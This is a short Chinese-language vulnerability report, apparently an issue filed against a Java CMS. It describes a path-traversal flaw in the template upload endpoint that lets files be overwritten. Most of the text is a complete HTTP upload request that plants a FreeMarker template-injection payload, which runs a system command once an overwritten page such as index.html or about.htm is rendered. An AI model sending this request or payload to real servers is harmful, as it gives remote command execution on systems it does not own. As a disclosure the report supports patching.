代码拉取完成,页面将自动刷新
ManageFileAction 存在模板上传 @PostMapping("/uploadTemplate"),正常目录为 /template/1/xxx,可通过修改目录为斜杠绕过限制至default目录。实现文件覆写
修改payload为命令执行,尝试覆写index.html,或者直接静态化主页用about.htm生成访问即可看到命令执行成功
数据包如下所示:
POST /ms/file/uploadTemplate.do HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------18073659414194577474845556017
Content-Length: 666
Origin: http://127.0.0.1:8081
DNT: 1
Connection: close
Referer: http://127.0.0.1:8081/ms/template/list.do?template=1/default
Cookie: 略
pageno_cookie=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------18073659414194577474845556017
Content-Disposition: form-data; name="uploadPath"
/////////////////////////////
-----------------------------18073659414194577474845556017
Content-Disposition: form-data; name="uploadFloderPath"
true
-----------------------------18073659414194577474845556017
Content-Disposition: form-data; name="rename"
false
-----------------------------18073659414194577474845556017
Content-Disposition: form-data; name="file"; filename="xxxxx"
Content-Type: image/png
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}
-----------------------------18073659414194577474845556017--